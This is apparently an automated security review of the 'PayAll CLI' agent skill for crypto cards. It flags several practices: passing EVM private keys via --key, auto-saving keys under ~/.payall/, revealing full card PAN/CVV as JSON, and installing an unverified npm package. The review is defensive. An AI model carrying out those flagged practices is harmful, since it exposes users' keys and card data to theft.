Skillv1.0.1

ClawScan security

PayAll CLI · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

SuspiciousMar 27, 2026, 1:12 AM

Verdict: suspicious
Confidence: medium
Model: gpt-5-mini
Summary: The skill’s instructions match a Payall CLI tool, but it encourages storing and passing extremely sensitive secrets (EVM private keys, full card PAN/CVV) and recommends installing an unverified npm package — reasonable for the claimed purpose but security-sensitive and worth caution.
Guidance: This skill appears to be what it says, but it handles very sensitive secrets and recommends installing an unverified npm package. Before installing or using it: 1) Verify the payall-cli package source (GitHub repo, maintainer, package contents) and audit the code if possible; 2) Do not pass your EVM private key on the command line to agents or automation; prefer hardware wallets or signed transactions when possible; 3) If you must use a private key, inspect how ~/.payall/ is protected and whether the claimed AES-256-GCM encryption and key management are implemented correctly; 4) Avoid using the --key auto-save option for long-term storage or in automated agents without strict isolation; 5) Treat any command that returns full card PAN/CVV JSON carefully and ensure it is used only in a secure, ephemeral context; 6) Consider running the CLI in a sandbox or VM and limit network access until you’ve validated telemetry/backend endpoints. If you want, I can list concrete checks to validate the npm package and the on-disk credential format.

Review Dimensions

Purpose & Capability: okThe name/description align with the runtime instructions: the SKILL.md documents running a payall CLI to manage crypto cards, view balances, top up with USDT, apply for cards, and perform wallet operations. Required capabilities are consistent with those actions.
Instruction Scope: concernThe instructions explicitly instruct non-interactive use by passing --key <private_key> and saving the private key to disk (AES-256-GCM encrypted at ~/.payall/). They also provide a --reveal --json output that returns full card PAN/CVV/billing data. Both behaviors are within the stated purpose but involve highly sensitive secrets and persistent local storage — agents could be asked to provide private keys on the command line or to access/reveal full card data, which raises data-exfiltration and persistence risks.
Install Mechanism: noteThe skill is instruction-only (no install spec), but SKILL.md tells users/agents to run 'npm install -g payall-cli' or 'bun install -g payall-cli'. Installing an unverified npm package is a supply-chain risk; the skill does not provide a homepage, repository, or verified source to validate the package before installation.
Credentials: noteThe skill declares no environment variables, which is coherent, but it requires handling extremely sensitive secrets (EVM private key, full card PAN/CVV). Requesting a private key is proportionate to wallet operations, but the guidance to auto-save keys for agent use increases risk and should be treated as a high-sensitivity requirement.
Persistence & Privilege: notealways is false and the skill does not request elevated platform privileges. However, the CLI's behavior of persisting encrypted credentials at ~/.payall/ and allowing auto-save via --key means secrets may persist on disk; that persistence is a security concern even if operationally justified.